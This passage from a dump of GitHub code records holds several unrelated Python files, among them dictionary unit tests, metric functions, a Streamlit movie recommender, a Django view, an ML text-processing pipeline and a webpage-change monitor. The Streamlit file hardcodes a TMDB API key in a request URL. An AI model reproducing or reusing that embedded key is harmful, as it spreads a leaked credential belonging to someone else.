def test_map(self):\n def func(k):\n k + 1\n\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 2)\n dict.add(0, 2)\n list = dict.to_list()\n list2 = []\n for i in list:\n i[1] = func(i[1])\n list2.append(i)\n\n itor = dict.map(func)\n test = []\n while itor.has_next():\n test.append(itor.__next__())\n self.assertEqual(test, list2)\n\n def test_reduce(self):\n def func(k, j):\n return k + j\n\n dict = mydict()\n dict.add(1, 2)\n dict.add(2, 2)\n dict.add(0, 2)\n sum = dict.reduce(func)\n self.assertEqual(sum, 6)\n\n def test_dict(self):\n d = mydict()\n self.assertEqual(d.find(1), None)\n d.add(0, 1)\n self.assertEqual(d.find(0), 1)\n d.add(0, 'dog')\n self.assertEqual(d.find(0), 'dog')\n d.add(1, None)\n self.assertEqual(d.find(1), None)\n\n def test_from_List(self):\n list = [[2, 3], [0, 1], [1, 2]]\n dict = mydict()\n dict.from_list(list)\n self.assertEqual([dict.root.k, dict.root.v], [1, 2])\n self.assertEqual([dict.root.lc.k, dict.root.lc.v], [0, 1])\n self.assertEqual([dict.root.rc.k, dict.root.rc.v], [2, 3])\n\n def test_to_List(self):\n dict = mydict()\n dict.add(0, 2)\n dict.add(1, 3)\n dict.add(2, 4)\n self.assertEqual(dict.to_list(), [[0, 2], [1, 3], [2, 4]])\n\n def test_mconcat(self):\n dict1 = mydict()\n dict2 = mydict()\n dict1.add(4, 1)\n dict1.add(1, 2)\n dict1.add(2, 2)\n dict1.add(0, 2)\n dict2.add(-1, 1)\n dict2.add(-1, 2)\n dict2.add(3, 2)\n dict2.add(1, 3)\n dict3 = mydict.mconcat(dict1, dict2)\n self.assertEqual(dict3.to_list(), [[-1, 2], [0, 2], [1, 2], [2, 2], [3, 2], [4, 1]])\n dict3 = mydict.mconcat(dict2, dict1)\n self.assertEqual(dict3.to_list(), [[-1, 2], [0, 2], [1, 2], [2, 2], [3, 2], [4, 1]])\n\n @given(st.lists(st.lists(st.integers(), min_size=2, max_size=4)))\n def test_from_list_to_list_equality(self, a):\n # The generated test data is processed\n dict = mydict()\n d = {}\n for i in a:\n d[i[0]] = i[1]\n key_value = list(d.keys())\n leng = len(key_value)\n for i in range(leng, 0, -1):\n for j in range(1, i):\n if (str(key_value[j]) < str(key_value[j - 1])):\n tem = key_value[j]\n key_value[j] = key_value[j - 1]\n key_value[j - 1] = tem\n\n value_list = list(d.values())\n c = []\n for i in range(len(key_value)):\n c.append([key_value[i], value_list[i]])\n dict.from_list(c)\n b = dict.to_list()\n self.assertEqual(b, c)\n\n @given(st.lists(st.lists(st.integers(), min_size=2, max_size=4)))\n def test_monoid_identity(self, a):\n # The generated test data is processed\n dict1 = mydict()\n dict2 = mydict()\n d = {}\n for i in a:\n d[i[0]] = i[1]\n key_value = list(d.keys())\n leng = len(key_value)\n for i in range(leng, 0, -1):\n for j in range(1, i):\n if (str(key_value[j]) < str(key_value[j - 1])):\n tem = key_value[j]\n key_value[j] = key_value[j - 1]\n key_value[j - 1] = tem\n value_list = list(d.values())\n c = []\n for i in range(len(key_value)):\n c.append([key_value[i], value_list[i]])\n dict2.from_list(c)\n dict2 = mydict.mconcat(dict1.mempty(), dict2)\n self.assertEqual(dict2.to_list(), c)\n\n dict1.from_list(c)\n dict1 = mydict.mconcat(dict1, dict2.mempty())\n self.assertEqual(dict1.to_list(), c)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"paopaowu/LAW-lab-1-variant6","sub_path":"src/mdict_test.py","file_name":"mdict_test.py","file_ext":"py","file_size_in_byte":5816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16050435144","text":"import os\n\nspecial_char = u'\\ufeff'\ndst_folder = os.getcwd()\nfilenames = [f for f in os.listdir(dst_folder) if 
os.path.isfile(f)]\nprint(filenames)\n\nfor filename in filenames:\n print(filename)\n f1 = open(file=filename, mode='r')\n f_content = f1.read()\n flag = f_content.find(special_char)\n f1.close()\n print(flag)\n\n if (flag != -1):\n f2 = open(file=filename, mode='w')\n f2.write(f_content.replace(special_char, ''))\n f2.close()","repo_name":"shopgauluoi/shopgauluoi.github.io","sub_path":"products/fix_encoding.py","file_name":"fix_encoding.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13884541231","text":"from __future__ import absolute_import\n\nfrom ctypes import Structure, c_short, c_ushort, c_int\n\n__all__=['DB2_TIMESTAMP']\n\nclass DB2_TIMESTAMP(Structure):\n '''\n SQLSMALLINT year;\n SQLUSMALLINT month;\n SQLUSMALLINT day\n SQLUSMALLINT hour;\n SQLUSMALLINT minute;\n SQLUSMALLINT second;\n SQLUINTEGER fraction;\n '''\n _pack_ = True\n _fields_ = [(\"year\", c_short),\n (\"month\", c_ushort),\n (\"day\", c_ushort),\n (\"hour\", c_ushort),\n (\"minute\", c_ushort),\n (\"second\", c_ushort),\n (\"fraction\", c_int),\n ]\n\n def __init__(self):\n self.year = 0\n self.month = 0\n self.day = 0\n self.hour = 0\n self.minute = 0\n self.second = 0\n self.fraction = 0\n\n def __str__(self):\n #my_str = \"\"\n #YYYY-MM-DD\n return \"%04d-%02d-%02d %d:%d:%d:%d\" % (\n self.year, \n self.month,\n self.day,\n self.hour,\n self.minute,\n self.second,\n self.fraction)\n\n\n","repo_name":"asierra01/ibm_db_test","sub_path":"cli_test_cases/DB2_TIMESTAMP.py","file_name":"DB2_TIMESTAMP.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34829091112","text":"import numpy as np\n\n\ndef cos_similarity(a, b):\n \"\"\"\n Calculate cosine similarity between input vectors\n\n :param a:\n :param b:\n :return: cosine similarity input vectors\n \"\"\"\n if len(a.shape) != len(b.shape):\n raise Exception('Input shapes must be the same')\n if not np.equal(a.shape, b.shape):\n raise Exception('Input shapes must be the same')\n\n return np.dot(a, b)/(np.linalg.norm(a) * np.linalg.norm(b))\n\n\ndef euclid_similarity(a, b):\n \"\"\"\n\n :param a:\n :param b:\n :return:\n \"\"\"\n if len(a.shape) != len(b.shape):\n raise Exception('Input shapes must be the same')\n if not np.equal(a.shape, b.shape):\n raise Exception('Input shapes must be the same')\n\n return 1 / np.sqrt(np.sum((a-b)**2))\n\n\ndef calc_eer(targ_scores, imp_scores):\n min_score = np.minimum(np.min(targ_scores), np.min(imp_scores))\n max_score = np.maximum(np.max(targ_scores), np.max(imp_scores))\n\n n_targs = len(targ_scores)\n n_imps = len(imp_scores)\n\n num_points = 50\n fa = np.zeros((num_points,))\n fr = np.zeros((num_points,))\n\n thrs = np.linspace(min_score, max_score, num_points)\n\n min_gap = float('inf')\n eer = 0\n\n for i, thr in enumerate(thrs):\n cur_fa = len(np.where(imp_scores > thr)[0]) / n_imps\n cur_fr = len(np.where(targ_scores < thr)[0]) / n_targs\n fa[i] = cur_fa\n fr[i] = cur_fr\n gap = np.abs(cur_fa - cur_fr)\n if gap < min_gap:\n min_gap = gap\n eer = (cur_fa + cur_fr) / 2\n\n return eer, fa, fr, thrs\n","repo_name":"Ananaskelly/TPE","sub_path":"core/metrics.py","file_name":"metrics.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2847777888","text":"import streamlit as st\nimport pickle\nimport pandas as 
pd\nimport requests\n\npage_bg_img = '''\n\n'''\nst.markdown(page_bg_img, unsafe_allow_html=True)\n\ndef fetch_poster(movie_id):\n response = requests.get(\"https://api.themoviedb.org/3/movie/{}?api_key=1dc95ecd8b14bc6f208b290e6fa18d62&language=en-US\".format(movie_id))\n data = response.json()\n return \"https://image.tmdb.org/t/p/w500/\" + data['poster_path']\n\n\ndef recommend(movie):\n movie_index = movies[movies['title'] == movie].index[0]\n distances = similarity[movie_index]\n movies_list = sorted(list(enumerate(distances)), reverse=True, key=lambda x: x[1])[1:6]\n\n recommended_movies = []\n recommended_movies_poster = []\n for i in movies_list:\n movie_id = movies.iloc[i[0]].movie_id\n recommended_movies.append(movies.iloc[i[0]].title)\n # fetch poster from API\n recommended_movies_poster.append(fetch_poster(movie_id))\n return recommended_movies, recommended_movies_poster\n\n\nmovies_dict = pickle.load(open('movie_dict.pkl', 'rb'))\nmovies = pd.DataFrame(movies_dict)\nsimilarity = pickle.load(open('similarity.pkl', 'rb'))\n\n\nst.title('FilmFinder: Navigating the Movie Universe')\n\nselected_movie_name = st.selectbox(\n 'How would you like to be contacted?',\n movies['title'].values)\n\n\nif st.button('Recommend'):\n names, posters = recommend(selected_movie_name)\n col1, col2, col3, col4, col5 = st.columns(5)\n\n with col1:\n st.text(names[0])\n st.image(posters[0])\n\n with col2:\n st.text(names[1])\n st.image(posters[1])\n\n with col3:\n st.text(names[2])\n st.image(posters[2])\n\n with col4:\n st.text(names[3])\n st.image(posters[3])\n\n with col5:\n st.text(names[4])\n st.image(posters[4])\n\n\n","repo_name":"afsalbadarudeen/Movie_recommender","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2172,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25424062837","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .models import Agent, Customer, Delivery\n# Create your views here.\n\n\n#basic version\n#def index(request):\n# return render(request, 'agentportal/index.html')\n\n#def index(request):\n\t\n#\tagentName= \"Agent1\"\n#\tagentName=request.POST['agentName']\n#\tselectedAgent=Agent.objects.get(name=agentName)\n#\tnameAddressList=[]\n\n#\tfor delivery in Delivery.objects.filter(agent=selectedAgent):\n#\t\tnameAddressList.append({'name':delivery.customer.name, 'address':delivery.customer.address})\n\n#:set\treturn render(request, 'agentportal/index.html', {'nameAddressList':nameAddressList})\n\ndef index(request):\n\tagentName= \"Agent1\"\n\tselectedAgent=Agent.objects.get(name=agentName)\n\tnameAddressList=[]\n\t\n\tfor delivery in Delivery.objects.filter(agent=selectedAgent):\n\t\tnameAddressList.append({'name':delivery.customer.name, 'address':delivery.customer.address})\n\t\n\treturn render(request, 'agentportal/index.html', {'nameAddressList':nameAddressList})\n\n","repo_name":"space-apes/EasyNews","sub_path":"news/agentportal/viewsBACKUP.py","file_name":"viewsBACKUP.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"13360252227","text":"import pickle\r\nimport numpy as np\r\nimport pandas as pd\r\nimport os\r\n\r\n\r\nclass XGBRegressionService:\r\n\r\n def __init__(self):\r\n if not os.path.exists('guess_estate_price/services/model.pkl'):\r\n raise Exception\r\n self.__reg_model = pickle.load(open('guess_estate_price/services/model.pkl', 
'rb'))\r\n\r\n def make_prediction(self, *args, _import=False):\r\n if not _import:\r\n input_data = np.array(args)\r\n pred = self.__reg_model.predict(input_data)\r\n else:\r\n pred = []\r\n for data in args:\r\n input_data = np.array(data)\r\n pred.append(self.__reg_model.predict(input_data))\r\n return pred\r\n\r\n\r\ndef predict(form):\r\n excl = 'csrfmiddlewaretoken'\r\n\r\n data = [float(form[param]) for param in form if param not in excl]\r\n return XGBRegressionService().make_prediction(data)\r\n\r\n\r\ndef predict_csv(file):\r\n _params = [\r\n 'city_id',\r\n 'district_id',\r\n 'street_id',\r\n 'floors_cnt',\r\n 'rooms_cnt',\r\n 'building_year',\r\n 'area_total',\r\n 'area_kitchen',\r\n 'series_id'\r\n ]\r\n csv = pd.read_csv(file)\r\n X = csv[_params]\r\n X = X.fillna(-1)\r\n\r\n return XGBRegressionService().make_prediction(X, _import=True)\r\n","repo_name":"anshmain/esoft_test","sub_path":"guess_estate_price/services/ml_predict.py","file_name":"ml_predict.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73432793491","text":"\"\"\" WSClient\"\"\"\n\n\nimport websocket\nimport gzip\nimport threading\nimport json\nimport pygame\nimport uuid\nimport traceback\n\n\ndef sync(func):\n def wrapper(self, data, call_back):\n rand = str(uuid.uuid4())\n self.call_backs[rand] = call_back\n return func(self, data, rand)\n\n return wrapper\n\n\nclass WSClient(threading.Thread):\n def __init__(self, field, url='ws://92.63.105.60:8000', debug=True):\n threading.Thread.__init__(self, target=self.run)\n self.name = \"Websocket client\"\n self.field = field\n self.url = url\n self.ws_connection = websocket.WebSocketApp(\n self.url,\n on_message=self.on_message,\n on_open=lambda x: print('Start'),\n on_close=self.on_close\n )\n self.ws_connection.keep_running = True\n if debug:\n self.ws_connection._callback = self.debug_callback\n self.start()\n self.ws_connection._callback = self.debug_callback\n self.call_backs = {}\n\n def send_message(self, data):\n \"\"\"\n Send message\n :param data: dict\n :return: None\n \"\"\"\n data = json.dumps(data)\n self.ws_connection.send(gzip.compress(data.encode('utf-8')), 2)\n\n def on_message(self, _, data):\n data = gzip.decompress(data)\n msg = json.loads(data.decode('utf-8'))\n typ = msg['type']\n data = msg['data']\n if msg.get('id'):\n self.call_backs[msg['id']](data)\n self.call_backs.pop(msg['id'])\n return\n if typ == 'auth_ok':\n with open('.cookie', 'w') as o:\n o.write(data['session'])\n elif typ == 'tick':\n self.field.update(data)\n elif typ == 'image':\n s = pygame.image.fromstring(data['src'], data['size'], 'RGBA')\n pygame.image.save(s, 'sprites/' + data['name'])\n else:\n pass\n\n def on_close(self, _):\n self.ws_connection.keep_running = False\n\n def action(self, action_type, data=''):\n self.send_message({'action': action_type, 'data': data})\n\n def auth(self, user, password, call_back):\n rand = str(uuid.uuid4())\n self.call_backs[rand] = call_back\n self.send_message({'type': 'auth', 'data': {'user': user, 'password': password, 'id': rand}})\n\n def run(self):\n self.ws_connection.run_forever()\n\n @sync\n def session_auth(self, session, func):\n self.send_message({'type': 'session_auth', 'data': {'session': session}, 'id': func})\n\n @sync\n def get_image(self, data, func):\n self.send_message({'type': 'get_image', 'data': data, 'id': func})\n\n def debug_callback(self, callback, *args):\n if callback:\n try:\n callback(self, 
*args)\n except:\n traceback.print_exc()","repo_name":"danya02/pygame-mmorpg","sub_path":"client/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"14943263722","text":"from pkcs1 import rsaes_oaep\n\nimport data\n\noaep_int_data = data.OaepIntData()\noaep_vect_data = data.OaepVectData()\n\n\ndef test_oaep_int_encryption():\n data = oaep_int_data\n encrypted = rsaes_oaep.encrypt(data.public_key, data.message, seed=data.seed)\n assert data.encrypted == encrypted\n\n\ndef test_oaep_int_decryption():\n data = oaep_int_data\n message = rsaes_oaep.decrypt(data.private_key, data.encrypted)\n assert data.message == message\n\n\ndef test_oaep_vect_encryption():\n data = oaep_vect_data\n for example in data.examples:\n public_key = example.public_key\n for sample in example.samples:\n encrypted = rsaes_oaep.encrypt(public_key, sample.message, seed=sample.seed)\n assert sample.encrypted == encrypted\n\n\ndef test_oaep_vect_decryption():\n data = oaep_vect_data\n for example in data.examples:\n private_key = example.private_key\n for sample in example.samples:\n message = rsaes_oaep.decrypt(private_key, sample.encrypted)\n assert sample.message == message\n","repo_name":"bdauvergne/python-pkcs1","sub_path":"tests/test_rsaes_oaep.py","file_name":"test_rsaes_oaep.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"66"} +{"seq_id":"21741348402","text":"from models import UserProfile,UserCreditEarningHistory\n\ndef add_user_credit_earning(user,description,amount):\n # update credit\n profile=UserProfile.objects.get(user=user)\n profile.credit=profile.credit+amount\n profile.save()\n # add history\n UserCreditEarningHistory.objects.create(\n user = profile,\n description=description,\n amount=amount,\n )","repo_name":"MarkusZhang/eventmgr","sub_path":"account/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32575479420","text":"# Import libraries\nimport os\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n# Set the file paths\nroot_folder_path = \"C:/Users/Matthew/Dropbox/Personal/School/JHU/Ethics/Project\"\nresults_folder_path = root_folder_path + \"/Data/Results\"\nanalysis_folder_path = root_folder_path + \"/Data/Analysis\"\n\n# Create an empty data frame\ndata = pd.DataFrame()\n\n# Get the results files\nresults_file_names = []\nfor results_file_name in os.listdir(results_folder_path):\n if results_file_name.endswith(\".csv\"):\n results_file_names.append(results_file_name)\n\n# Loop through the results files\nfor results_file_name in results_file_names:\n\n # Get the file path\n results_file_path = results_folder_path + \"/\" + results_file_name\n\n # Read the data\n data_to_append = pd.read_csv(results_file_path)\n\n # Get the model and treatment\n model_name_parts = results_file_name.split(\"-\")[0:-1]\n model_name = \"-\".join(model_name_parts)\n treatment = results_file_name.split(\"-\")[-1].split(\".\")[0]\n\n # Insert the model and treatment\n data_to_append.insert(0, \"Model\", model_name)\n data_to_append.insert(1, \"Treatment\", treatment)\n\n # Append the data\n data = data._append(data_to_append, ignore_index=True)\n\n# Copy the data\ndata_to_summarize = data.copy()\n\n# Remove the case_id column\ndata_to_summarize = 
data_to_summarize.drop(columns=['case_id'])\n\n# Rename \"id\" column\ndata_to_summarize = data_to_summarize.rename(columns={\"id\": \"case_id\"})\n\n# Group the data by 'Model' and 'Treatment'\ngrouped_data = data_to_summarize.groupby(['Model', 'Treatment'])\n\n# Define unique_values\nunique_values = [-1, 0, 1]\n\n# Create an empty list to store the aggregated data\nsummary_data = []\n\n# Loop through each group and count correctness values\nfor (model, treatment), group in grouped_data:\n for value in unique_values:\n value_counts = (group == value).sum()\n row = {'Value': value, 'Model': model, 'Treatment': treatment, **value_counts.to_dict()}\n row[\"Model\"] = model\n row[\"Treatment\"] = treatment\n summary_data.append(row)\n\n# Create a summary DataFrame from the aggregated data\nsummary = pd.DataFrame(summary_data)\n\n# Move Value to the third column\ncols = summary.columns.tolist()\ncols = cols[1:3] + cols[0:1] + cols[3:-1]\nsummary = summary[cols]\n\n# Create a new table for the total counts\ntotal_counts = summary\\\n .set_index([\"Model\", \"Treatment\", \"Value\"])\\\n .sum(axis=1)\\\n .reset_index(name='Total')\n\n# Display the total counts\nprint(total_counts)\n\n# Concatenate Model, Treatment, and Value with a hyphen\ntotal_counts['ID'] = total_counts['Model'] + \"-\" + total_counts['Treatment']\n\n# Create a new table for the final results\nfinal_results = pd.DataFrame()\n\n# For each ID, get the correct, neutral, and incorrect totals\nfor id, group in total_counts.groupby('ID'):\n correct_total = group[group['Value'] == 1]['Total'].sum()\n neutral_total = group[group['Value'] == 0]['Total'].sum()\n incorrect_total = group[group['Value'] == -1]['Total'].sum()\n print(f\"{id}: {correct_total}, {neutral_total}, {incorrect_total}\")\n\n # Add correct and neutral totals\n correct_and_neutral_total = correct_total + neutral_total\n\n # Compute accuracy\n accuracy = correct_and_neutral_total / (correct_total + neutral_total + incorrect_total)\n\n # Create a new row for the final results table\n row = {\n 'ID': id,\n 'Correct': correct_total,\n 'Neutral': neutral_total,\n 'Incorrect': incorrect_total,\n 'Accuracy': accuracy}\n\n # Add the results to the final results table\n final_results = final_results._append(row, ignore_index=True)\n\n # Display the accuracy\n print(f\"{id}: {accuracy:.4}\")\n print()\n\n# Display a bar chart of the final results\nfinal_results.plot.bar(\n x='ID',\n y='Accuracy',\n figsize=(10, 5))\nplt.ylim(0.0, 1.0)\nplt.title('Accuracy by Model')\nplt.xlabel('Model')\nplt.ylabel('Accuracy')\nplt.xticks(rotation=15, ha='right')\nplt.subplots_adjust(bottom=0.2)\nplt.gca().get_legend().remove()\n\n# Add labels to the bars\nfor index, row in final_results.iterrows():\n plt.text(\n x=index,\n y=row['Accuracy'] - 0.05,\n s=f\"{row['Accuracy']:.3f}\",\n ha='center',\n color='white',)\n\n# Save the plot as an SVG file\naccuracy_svg_file_path = analysis_folder_path + \"/SVG/\" + \"accuracy-by-model.svg\"\nplt.savefig(accuracy_svg_file_path, bbox_inches=\"tight\")\n\n# Save the plot as a PNG file\naccuracy_png_file_path = analysis_folder_path + \"/PNG/\" + \"accuracy-by-model.png\"\nplt.savefig(accuracy_png_file_path, bbox_inches=\"tight\", dpi=300)\n\n# Save the data to a CSV file\naccuracy_csv_file_path = analysis_folder_path + \"/CSV/\" + \"accuracy-by-model.csv\"\nfinal_results.to_csv(accuracy_csv_file_path, index=False)\n\n# Display the plot\nplt.show()\n\n# Copy the data\ndata_to_summarize = data.copy()\n\n# Make zero values positive cases (i.e. 
correct predictions)\ndata_to_summarize = data_to_summarize.replace(0, 1)\n\n# Make negative values negative cases (i.e. incorrect predictions)\ndata_to_summarize = data_to_summarize.replace(-1, 0)\n\n# Remove the case_id column (needed to make aggregation work)\ndata_to_summarize = data_to_summarize.drop(columns=['case_id'])\ndata_to_summarize = data_to_summarize.rename(columns={\"id\": \"case_id\"})\n\n# Aggregate the details data\ngrouped_data = data_to_summarize.groupby(['Model', 'Treatment'])\ndetails_data = pd.DataFrame()\nfor (model, treatment), group in grouped_data:\n numeric_group = group.select_dtypes(include='number')\n row = {'Model': model, 'Treatment': treatment, **numeric_group.mean().to_dict()}\n details_data = details_data._append(row, ignore_index=True)\n\n# For each model-treatment, plot the accuracy of all columns as a separate bar chart\nfor (model, treatment), group in details_data.groupby(['Model', 'Treatment']):\n group = group.drop(columns=['Model', 'Treatment'])\n group = group.iloc[0].transpose().to_frame()\n group.plot.barh(\n legend=False,\n figsize=(10, 5))\n plt.title(f\"{model} - {treatment}\")\n plt.xlabel('Accuracy')\n plt.ylabel('Feature')\n plt.gca().invert_yaxis()\n plt.yticks(fontsize=8)\n plt.xticks(rotation=15, ha='right')\n plt.subplots_adjust(left=0.25)\n\n # Save the plot as an SVG file\n details_svg_file_path = analysis_folder_path + \"/SVG/\" + f\"{model}-{treatment}-details.svg\"\n plt.savefig(details_svg_file_path, bbox_inches=\"tight\")\n\n # Save the plot as a PNG file\n details_png_file_path = analysis_folder_path + \"/PNG/\" + f\"{model}-{treatment}-details.png\"\n plt.savefig(details_png_file_path, bbox_inches=\"tight\", dpi=300)\n\n # Save the data to a CSV file\n details_csv_file_path = analysis_folder_path + \"/CSV/\" + f\"{model}-{treatment}-details.csv\"\n final_results.to_csv(details_csv_file_path, index=False)\n\n # Display the plot\n plt.show()\n\n\n\n\n\n\n\n\n\n","repo_name":"matthewrenze/jhu-ai-ethics-final-project","sub_path":"Code/Analyze/analyze_accuracy.py","file_name":"analyze_accuracy.py","file_ext":"py","file_size_in_byte":6845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"27323305460","text":"import numpy as np\nimport tensorflow_datasets as tfds\nimport tensorflow as tf\nfrom sklearn.utils import shuffle\nimport nltk\nfrom nltk.tokenize.treebank import TreebankWordDetokenizer\nimport random\n\nkeep_words = ['NNS', 'NN', 'NNP', 'NNPS', 'CC', 'IN']\nnltk.download('punkt')\nnltk.download('averaged_perceptron_tagger')\n\ndef create_int_feature(values):\n f = tf.train.Feature(int64_list=tf.train.Int64List(value=list(values)))\n return f\n\n\ndef text_processor(data_path, data_name, title_max_len, abstract_max_len, vocab_level, processed_path):\n samples = []\n dir_path = data_path\n queries = []\n\n if not tf.gfile.Exists(processed_path):\n tf.gfile.MakeDirs(processed_path)\n\n with tf.gfile.Open(dir_path + \"/\" + data_name + \".txt\") as f:\n for line in f:\n line = line.lower()\n samples.append(str.encode(line[:-1]))\n\n with tf.gfile.Open(dir_path + \"/\" + data_name + \"_query.txt\") as f:\n for line in f:\n line = line.lower()\n queries.append(str.encode(line[:-1]))\n\n # Also pad the prediction titles and abstracts with dummies\n dummy_abstracts = [data_name] * len(queries)\n dummy_titles = [data_name] * len(queries)\n\n if not tf.gfile.Exists(processed_path + \"/\" + data_name + \".subwords\"):\n print(\"Vocab file does not exist, making a new 
one.\")\n tokenizer = get_tokenizer(samples, vocab_level)\n tokenizer.save_to_file(processed_path + \"/\" + data_name)\n else:\n print(\"Found an existing vocab file, using this one.\")\n tokenizer = tfds.features.text.SubwordTextEncoder.load_from_file(processed_path + \"/\" + data_name)\n\n vocab_size = tokenizer.vocab_size + 2\n\n # Create separate lists for abstracts and title\n titles = []\n\n num_papers = len(samples) / 2\n currentIndex = 0\n\n # print(\"separating titles from abstracts\")\n while currentIndex < num_papers:\n titles.append(samples.pop(currentIndex))\n currentIndex += 1\n\n abstracts = samples\n\n abstracts, titles = shuffle(abstracts, titles)\n dummy_queries = [\"dummy query\"] * len(abstracts)\n\n augmented_queries = []\n augmented_abstracts = []\n augmented_titles = []\n\n # Augment the data\n for i in range(len(titles)):\n new_queries = get_simpler_titles(titles[i])\n new_abstracts = [abstracts[i]] * len(new_queries)\n new_titles = [titles[i]] * len(new_queries)\n augmented_queries += new_queries\n augmented_abstracts += new_abstracts\n augmented_titles += new_titles\n\n train_abstracts, train_titles, train_queries = shuffle(augmented_abstracts[:-10000], augmented_titles[:-10000], augmented_queries[:-10000])\n\n def encode(sample):\n \"\"\"Turns an abstract in English into BPE (Byte Pair Encoding).\n Adds start and end token to the abstract.\n\n Keyword arguments:\n abstract -- the abstract (type: bytes)\n \"\"\"\n\n encoded_sample = [tokenizer.vocab_size] + tokenizer.encode(sample) + [tokenizer.vocab_size + 1]\n\n return encoded_sample\n\n # abstract_lengths = [0] * 1000\n # title_lengths = [0] * 200\n\n def write_tfrecords(titles, abstracts, queries, data_name):\n full_path = processed_path + \"/\" + data_name + \".tfrecords\"\n if not tf.gfile.Exists(full_path):\n\n writer = tf.io.TFRecordWriter(full_path)\n counter = 0\n\n for title, abstract, query in zip(titles, abstracts, queries):\n if counter % 1000 == 0:\n print(\"Number of examples written to tfrecord: \" + str(counter))\n counter += 1\n encoded_title = encode(title)\n encoded_abstract = encode(abstract)\n encoded_query = encode(query)\n\n if len(encoded_abstract) <= abstract_max_len and len(encoded_title) <= title_max_len:\n # abstract_lengths[len(encoded_abstract)] += 1\n # title_lengths[len(encoded_title)] += 1\n\n title_length = len(encoded_title)\n padding = title_max_len - title_length\n if padding >= 0:\n title_feature = np.pad(encoded_title, (0, padding), 'constant')\n\n abstract_length = len(encoded_abstract)\n padding = abstract_max_len - abstract_length\n if padding >= 0:\n abstract_feature = np.pad(encoded_abstract, (0, padding), 'constant')\n\n query_length = len(encoded_query)\n padding = title_max_len - query_length\n if padding >= 0:\n query_feature = np.pad(encoded_query, (0, padding), 'constant')\n\n example = {}\n example[\"abstracts\"] = create_int_feature(abstract_feature)\n example[\"titles\"] = create_int_feature(title_feature)\n example[\"queries\"] = create_int_feature(query_feature)\n\n tf_example = tf.train.Example(features=tf.train.Features(feature=example))\n writer.write(tf_example.SerializeToString())\n\n writer.close()\n\n write_tfrecords(train_titles, train_abstracts, train_queries, \"training\")\n write_tfrecords(augmented_titles[-10000:], augmented_abstracts[-10000:], augmented_queries[-10000:], \"testing\")\n write_tfrecords(titles, abstracts, dummy_queries, \"original\")\n write_tfrecords(dummy_titles, dummy_abstracts, queries, \"query\")\n\n # # Get the distribution 
on the length of each fact in tokens\n # print(\"abstract_lengths: \")\n # for i, length in enumerate(abstract_lengths):\n # print(str(i) + \": \" + str(length))\n #\n # print(\"title_lengths: \")\n # for i, length in enumerate(title_lengths):\n # print(str(i) + \": \" + str(length))\n\n return vocab_size, tokenizer\n\n\ndef get_tokenizer(texts, vocab_level):\n input_vocab_size = 2 ** vocab_level\n\n # Create a BPE vocabulary using the abstracts\n\n return tfds.features.text.SubwordTextEncoder.build_from_corpus(\n texts, target_vocab_size=input_vocab_size)\n\ndef get_simpler_titles(title):\n tokens = nltk.word_tokenize(title.decode())\n tagged_tokens = nltk.pos_tag(tokens)\n non_noun_tokens = [i for i in range(len(tagged_tokens)) if tagged_tokens[i][1] not in keep_words]\n pop_list = []\n pop_list.append([i for i in non_noun_tokens if random.random() > 0.2])\n pop_list.append([i for i in non_noun_tokens if random.random() > 0.5])\n pop_list.append([i for i in non_noun_tokens if random.random() > 0.8])\n\n new_titles = [title]\n\n for pop in pop_list:\n new_title = TreebankWordDetokenizer().detokenize([tokens[i] for i in range(len(tokens)) if i not in pop])\n if new_title not in new_titles and new_title != title:\n new_titles.append(str.encode(new_title))\n\n return new_titles","repo_name":"TianrenWang/NeuralMatcher","sub_path":"text_processor.py","file_name":"text_processor.py","file_ext":"py","file_size_in_byte":6873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"42817842725","text":"import requests\nimport time\nfrom datetime import datetime\nfrom bs4 import BeautifulSoup\n\n\nOK_TEXT = \"\\033[92mOK\\033[0m\"\nCHANGED_TEXT = \"\\033[93mCHANGED\\033[0m\"\nERROR_TEXT = \"\\033[91mERROR\\033[0m\"\nSEPARATOR_TEXT = '-' * 30 + '\\n'\n\n\ndef get_parsed_webpage(url):\n r = requests.get(url)\n soup = BeautifulSoup(r.text, 'html.parser')\n return soup\n\n\ndef log(level, msg):\n now = datetime.now().strftime(\"%d-%m-%Y %H:%M:%S\")\n level = level.lower()\n if level == 'ok':\n print(f\"{now} - [{OK_TEXT}] - {msg}\")\n elif level == 'changed':\n print(f\"{now} - [{CHANGED_TEXT}] - {msg}\")\n elif level == 'error':\n print(f\"{now} - [{ERROR_TEXT}] - {msg}\")\n\n\ndef monitoring_loop(urls, cooldown):\n try:\n # First check\n print(\"\\nPierwsze sprawdzenie...\\n\")\n last_content = {}\n webpage_responses = {}\n for url in urls:\n # Add url entry to responses dict\n webpage_responses[url] = {'ok': 0, 'changed': 0, 'error': 0}\n\n # Fetch webpage\n try: \n last_content[url] = 